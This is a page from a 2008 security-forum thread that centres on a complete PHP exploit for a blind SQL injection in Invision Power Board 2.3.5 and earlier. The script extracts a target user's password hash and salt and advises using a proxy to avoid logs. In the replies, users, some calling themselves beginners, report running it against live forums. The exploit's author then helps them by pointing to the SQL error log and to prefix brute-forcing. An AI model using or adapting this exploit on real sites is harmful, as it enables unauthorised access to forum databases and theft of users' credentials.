Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
November 14, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 300
Members: 0
Total: 300
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> IPB <= 2.3.5 sql injection hash/salt fetching exploit Goto page Previous  1, 2, 3, 4, 5  Next
Post new topic  Reply to topic View previous topic :: View next topic 
PostPosted: Sun Oct 05, 2008 7:19 am Reply with quote
SnIpEr
Active user
Active user
 
Joined: Sep 25, 2008
Posts: 37




Well here's the problem. I know how to run it now, but I keep getting this error:



Anyone know how to fix this?
View user's profile Send private message
PostPosted: Tue Oct 07, 2008 6:20 pm Reply with quote
mairh
Beginner
Beginner
 
Joined: Oct 07, 2008
Posts: 1




guys because i am a noob can you tell me how can i use that exploit?
View user's profile Send private message
Re: IPB <= 2.3.5 sql injection hash/salt fetching exploit
PostPosted: Thu Oct 16, 2008 1:35 am Reply with quote
devildavid
Regular user
Regular user
 
Joined: Oct 16, 2008
Posts: 6




waraxe wrote:
Based on DarkFig's excellent advisory. Easy to use, fast and usually does leave minimal log traces.

Feedback is welcome!

[[update]] ==> version 1.1 with Curl autoload!

Code:

<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB <= 2.3.5 sql injection exploit
// Version 1.1
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 22. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$url = 'http://localhost/ipb.2.3.5/';
$id = 1;// ID of the target user, default value "1" is admin's ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//======================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
//=====================================================================
///////////////////////////////////////////////////////////////////////
if(!extension_loaded('curl'))
{
   if(!dl('php_curl.dll'))
   {
      die("Curl extension not loaded!\n Fatal exit ...\n");
   }
   else
   {
      echo "Curl loading success\n";
   }
}
//=====================================================================
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
   if(!isset($_REQUEST['wtf-is-cli']))
   {
      echo "<html><head><title>Attention!</title></head>\n";
      echo "<body><br /><br /><center>\n";
      echo "<h1>Warning!</h1>\n";
      echo "This exploit is meant to be used as php CLI script!<br />\n";
      echo "More information:<br />\n";
      echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
      echo "Still, you can try to run it from webserver.<br />\n";
      echo "Just press the button below and prepare for long waiting<br />\n";
      echo "And learn to use php CLI next time, please ...<br />\n";
      echo "<form method=\"get\">\n";
      echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
      echo "</form>\n";
      echo "</center></body></html>\n";
      exit;
   }
   else
   {
      // Let's try to maximize our chances without CLI
      @set_time_limit(0);
   }
}
//=====================================================================
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");

$hash = get_hash();
$salt = get_salt();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");
add_line("Salt: $salt");
add_line("------------------------------------------");

xecho("\n------------------------------------------\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");

xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
   global $url;
   
   $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
   $buff = trim(make_post($url, $post, '', $url));
   if($buff !== 'found')
   {
      die('Invalid response, target URL not valid? Exiting ...');
   }
}
//////////////////////////////////////////////////////////////////////
function test_target_id()
{
   global $url, $prefix, $id;
   
   $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
   if(!test_condition($post))
   {
      die('Invalid response, target ID not valid? Exiting ...');
   }
}
///////////////////////////////////////////////////////////////////////
function get_salt()
{
   $len = 5;
   $out = '';
   
   xecho("Finding salt ...\n");
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_saltchar($i);
      xecho("Got pos $i --> $ch\n");
      $out .= "$ch";
      xecho("Current salt: $out \n");
   }
   
   xecho("\nFinal salt: $out\n\n");
   
   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos)
{
   global $prefix, $id;

   $char = '';
   $min = 32;
   $max = 128;
   $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $post = $pattern . "=$max";
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
      
      $half = intval(floor($area / 2));
      $curr = $min + $half;
      
      $post = $pattern . '%253e' . $curr;
      
      $bigger = test_condition($post);
      
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      xecho("Current test: $curr-$max-$min\n");
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
   $len = 32;
   $out = '';
   
   xecho("Finding hash ...\n");
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_hashchar($i);
      xecho("Got pos $i --> $ch\n");
      $out .= "$ch";
      xecho("Current hash: $out \n");
   }
   
   xecho("\nFinal hash: $out\n\n");
   
   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos)
{
   global $prefix, $id;

   $char = '';
   $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";

   // First let's determine, if it's number or letter
   $post = $pattern . '%253e57';
   $letter = test_condition($post);
   
   if($letter)
   {
      $min = 97;
      $max = 102;
      xecho("Char to find is [a-f]\n");
   }
   else
   {
      $min = 48;
      $max = 57;
      xecho("Char to find is [0-9]\n");
   }

   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $post = $pattern . "=$max";
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
      
      $half = intval(floor($area / 2));
      $curr = $min + $half;
      
      $post = $pattern . '%253e' . $curr;
      
      $bigger = test_condition($post);
      
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      xecho("Current test: $curr-$max-$min\n");
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
   global $url;
   
   $bret = false;
   $maxtry = 10;
   $try = 1;
      
   $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
   $post = sprintf($pattern, $p);
   
   while(1)
   {
      $buff = trim(make_post($url, $post, '', $url));

      if($buff === 'found')
      {
         $bret = true;
         break;
      }
      elseif($buff === 'notfound')
      {
         break;
      }
      elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
      {
         die("Sql error! Wrong prefix?\nExiting ... ");
      }
      else
      {
         xecho("test_condition() - try $try - invalid return value ...\n");
         $try ++;
         if($try > $maxtry)
         {
            die("Too many tries - exiting ...\n");
         }
         else
         {
            xecho("Trying again - try $try ...\n");
         }
      }
   }
   
   return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt ($ch, CURLOPT_URL, $url);
   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
   
   if(!empty($GLOBALS['proxy_ip_port']))
   {
      curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
      
      if(!empty($GLOBALS['proxy_user_password']))
      {
         curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
      }
   }
   
   if(!empty($cookie))
   {
      curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt ($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt ($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt ($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   
   return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
   global $outfile;
   
   $line .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $line);
   fclose($fh);
   
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
   if($GLOBALS['cli'])
   {
      echo "$line";
   }
   else
   {
      $line = nl2br(htmlspecialchars($line));
      echo "$line";
   }
}
//////////////////////////////////////////////////////////////////////
?>


still i dont understand how to use the exploit any deep explain?
View user's profile Send private message Visit poster's website
PostPosted: Sun Oct 19, 2008 9:20 am Reply with quote
CygniX
Beginner
Beginner
 
Joined: Oct 19, 2008
Posts: 3




Weird error. I get this every time: what's with this? I have tested the forum, and the IPS error thrown up means that it's vulnerable. But this output = whyyyy?

Code:
Target: http://someforum
Sql table prefix: ibf_
Testing target URL ...
Target URL seems to be valid

Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402

Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403

Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404

Notice: Undefined variable: i in /home/ryu/public_html/ipbsingleuser.php on line 102

Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402

Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403

Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404

------------------------------------------
User ID: 163376
Hash: ffffffffffffffffffffffffffffffff
Salt:
------------------------------------------

Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402

Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403

Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404

Questions and feedback - http://www.waraxe.us/
See ya! :)
View user's profile Send private message
PostPosted: Sun Oct 19, 2008 11:15 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Like error message says, script does not have write permissions in current directory. So you can just disable logging functionality by commenting out some lines in php code.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Oct 19, 2008 1:48 pm Reply with quote
CygniX
Beginner
Beginner
 
Joined: Oct 19, 2008
Posts: 3




How about the wrong hash and salt given?
View user's profile Send private message
PostPosted: Sun Oct 19, 2008 2:05 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




CygniX wrote:
How about the wrong hash and salt given?


Well, my script makes two prechecks, one for URL and one for userID. And if one of them fails, then execution will be stopped. So this seems to be some kind of patch or custom IPB code modification, which makes exploit pass pretests and then fail hash fetching.
If you are sure, that target is still vulnerable (you can produce sql error?), then you need manually make blind sql injection tests and find out possible exploitability. Maybe you need your own custom exploit or just try to modify original exploit so it will work.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Oct 20, 2008 12:46 am Reply with quote
CygniX
Beginner
Beginner
 
Joined: Oct 19, 2008
Posts: 3




Oh. Ok, thanks!

I'll try that. Very Happy
View user's profile Send private message
PostPosted: Sun Oct 26, 2008 7:09 pm Reply with quote
mattoni
Active user
Active user
 
Joined: Oct 26, 2008
Posts: 34
Location: United Kingdom




that does mean allready pacthed ?
View user's profile Send private message
PostPosted: Wed Nov 05, 2008 6:59 pm Reply with quote
charlis
Beginner
Beginner
 
Joined: Nov 05, 2008
Posts: 1




Sql table prefix: ibf_
Testing target URL ...
Target URL seems to be valid
Testing ID 1
ID 1 not valid, passing ...
Testing ID 2
ID 2 validated
Finding hash ...
Sql error! Wrong prefix?


it looks like prefix is working..
Then maybe site is patched?(passed admin) Any way to deal with already patched site? OR just wrong prefix? If so, any way to get prefix?


Thanks.
View user's profile Send private message
PostPosted: Wed Nov 05, 2008 8:32 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Probably wrong prefix. You can try to look at sql error log:

Code:

http://***/cache/sql_error_log_09_24_08.cgi


Just use current date in file name.
And ... some servers are showing cgi files as plain text, but others will give you error 500 or 403 ...

Another option is to either bruteforce prefix or use information_schema. But it means, that you have to add additional functionality to the exploit Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Nov 11, 2008 2:37 pm Reply with quote
wUK
Beginner
Beginner
 
Joined: Nov 11, 2008
Posts: 2




I get the following error when trying this:

Quote:
The application has failed to start because php4tl.dll was not found.

I didn't have php_curl.dll to start with but found it online so I'm guessing that's not the way.
View user's profile Send private message Visit poster's website
PostPosted: Wed Nov 12, 2008 1:54 am Reply with quote
_mranderson_
Valuable expert
Valuable expert
 
Joined: Oct 30, 2008
Posts: 51




google curl download and install it, it's that easy
View user's profile Send private message
PostPosted: Sat Dec 13, 2008 11:07 am Reply with quote
almostwOw
Beginner
Beginner
 
Joined: Dec 10, 2008
Posts: 4




Can you learn me how to use this script or something

I'm Noob Embarassed
View user's profile Send private message
PostPosted: Sat Dec 13, 2008 3:03 pm Reply with quote
gyan007
Advanced user
Advanced user
 
Joined: Oct 17, 2008
Posts: 106




almostwOw wrote:
Can you learn me how to use this script or something

I'm Noob Embarassed


Google executing php script. The exploit is php.
View user's profile Send private message
IPB <= 2.3.5 sql injection hash/salt fetching exploit
  www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 4 of 5  
Goto page Previous  1, 2, 3, 4, 5  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Movie Reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.100 Seconds